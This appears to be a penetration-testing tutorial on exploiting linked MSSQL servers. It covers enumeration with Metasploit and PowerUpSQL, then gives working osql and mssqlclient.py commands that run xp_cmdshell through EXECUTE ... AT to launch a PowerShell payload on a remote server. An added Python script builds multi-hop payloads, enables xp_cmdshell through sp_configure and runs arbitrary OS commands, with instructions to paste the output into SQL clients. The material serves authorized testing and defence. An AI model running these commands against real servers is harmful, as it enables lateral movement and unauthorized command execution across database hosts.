Intro
Linked MSSQL servers permit one database server to query data on a remote server, outside of the immediate MSSQL server instance. Servers are not inherently vulnerable just because they are linked. Rather, servers that are vulnerable to initial compromise, such as those with insecure credentials, or those where xp_cmdshell is enabled for low-privileged accounts, can provide a pathway to exploitation: every query sent across a link runs on the remote side as the login configured on that link, so a link that connects as sysadmin hands that privilege to whoever controls the source server.
Identifying Vulnerable Linked MSSQL Servers
There are two common tools for identifying linked MSSQL servers: a Metasploit module and PowerUpSQL. Both essentially do the same thing, and both can authenticate to the starting server with either SQL or Windows credentials; what happens on each subsequent hop is decided by the login configured on the link, not by the account used to connect.
Metasploit has a module called windows/mssql/mssql_linkcrawler which can be used to enumerate linked servers, link permissions, and links that connect with sysadmin rights.
Its output is nearly identical to that of the Get-SQLServerLinkCrawl -Verbose command from PowerUpSQL.
Exploitation
There are different ways to exploit the link once it is identified. Impacket has a tool called mssqlclient.py, and Windows servers that host MSSQL have the osql command-line client (deprecated in favour of sqlcmd, which accepts the same -E, -S and -Q switches used below).
As an example below, osql is used to run a PowerShell runner with a web_delivery payload on the linked server. The -E switch authenticates to "hostname" as the current Windows user; the EXECUTE ... AT clause then forwards the inner statement across the link, where it runs as the link's configured login. This only works if RPC Out is enabled on the link and xp_cmdshell is enabled on the linked server (a link with sysadmin rights can enable it with sp_configure).
osql -E -S "hostname" -Q "EXECUTE('exec master..xp_cmdshell ''powershell -File C:\Users\public\documents\pstest.ps1''') AT [linked.server.local]"
Utilizing mssqlclient.py, the same is possible. First, authenticate with valid credentials for the server (add -windows-auth for Windows authentication), and then execute:
EXECUTE('exec master..xp_cmdshell ''powershell -File C:\Users\public\documents\pstest.ps1''') AT [linked.server.local]
Note the doubled single quotes: the inner statement is a string literal inside EXECUTE(), so every quote it contains must be escaped, and each additional hop doubles them again.
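The crawl described in the identification section and the EXECUTE ... AT payload above are the same mechanism applied one hop at a time. The following is an added example, not code from the original page nor from PowerUpSQL, Metasploit or Impacket: it builds the T-SQL a crawler sends for link enumeration, and wraps an arbitrary statement (including the xp_cmdshell call from the page) so that it runs N hops down a chain of links, doubling the single quotes correctly at each hop. The server names SQL02 and SQL03 and the command strings are constructed for illustration; nothing is sent anywhere, the script only produces statements to paste into osql, sqlcmd or mssqlclient.py.

```python
"""
Added example: T-SQL builder for linked-server enumeration and multi-hop
EXECUTE ... AT payloads. Link names and commands below are constructed;
run the printed statements with osql/sqlcmd/mssqlclient.py yourself.
"""

# Links visible from whatever server the query runs on. sys.servers row 0 is
# the instance itself, so it is excluded. EXECUTE ... AT [link] only works
# when is_rpc_out_enabled = 1 on that link.
LINK_ENUM_SQL = (
    "SELECT name, is_rpc_out_enabled, is_data_access_enabled "
    "FROM sys.servers WHERE server_id > 0"
)

# Which login the link maps us to on the remote side, and whether it is sysadmin.
WHOAMI_SQL = "SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin')"

# value_in_use = 1 means xp_cmdshell is already enabled on that server.
XP_CMDSHELL_CHECK_SQL = (
    "SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'"
)

# Only succeeds if the link's login is sysadmin on the remote side.
ENABLE_XP_CMDSHELL_SQL = (
    "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; "
    "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
)


def tsql_literal(text: str) -> str:
    """Escape text for use inside a single-quoted T-SQL string literal."""
    return text.replace("'", "''")


def tsql_identifier(name: str) -> str:
    """Escape a server name for use inside [brackets]."""
    return name.replace("]", "]]")


def wrap_at(chain, statement):
    """
    Wrap `statement` so it executes on the last server in `chain`.

    chain = ["SQL02", "SQL03"] means: SQL03 is a link of SQL02, which is a link
    of the server we are connected to. The innermost hop is wrapped first; each
    wrap turns the current text into a string literal, so its quotes double.
    An empty chain returns the statement unchanged (run locally).
    """
    sql = statement
    for link in reversed(chain):
        sql = f"EXECUTE('{tsql_literal(sql)}') AT [{tsql_identifier(link)}]"
    return sql


def xp_cmdshell_at(chain, command):
    """Run an OS command through xp_cmdshell on the last server of `chain`."""
    return wrap_at(chain, f"EXEC master..xp_cmdshell '{tsql_literal(command)}'")


def enable_xp_cmdshell_at(chain):
    """Enable xp_cmdshell on the last server of `chain` (needs sysadmin there)."""
    return wrap_at(chain, ENABLE_XP_CMDSHELL_SQL)


def crawl_statements(chain):
    """The three checks a crawler runs at each hop, wrapped for that hop."""
    return {
        "links": wrap_at(chain, LINK_ENUM_SQL),
        "whoami": wrap_at(chain, WHOAMI_SQL),
        "xp_cmdshell": wrap_at(chain, XP_CMDSHELL_CHECK_SQL),
    }


if __name__ == "__main__":
    # Constructed chain: we are on SQL01, which links to SQL02, which links to SQL03.
    for hop in (["SQL02"], ["SQL02", "SQL03"]):
        print(f"-- hop {' -> '.join(hop)}")
        for label, sql in crawl_statements(hop).items():
            print(f"{label}: {sql}")
    print("-- enable then run:")
    print(enable_xp_cmdshell_at(["SQL02", "SQL03"]))
    print(xp_cmdshell_at(["SQL02", "SQL03"], "whoami"))
```

Paste the single-hop output into osql -Q "..." as on the page, or straight into the mssqlclient.py prompt. With the two-hop chain the innermost quotes are quadrupled, which is exactly the error-prone part that mssql_linkcrawler and Get-SQLServerLinkCrawl automate; checking the "links" and "whoami" results at each hop before sending the xp_cmdshell call avoids blind execution on a link that lacks RPC Out or sysadmin.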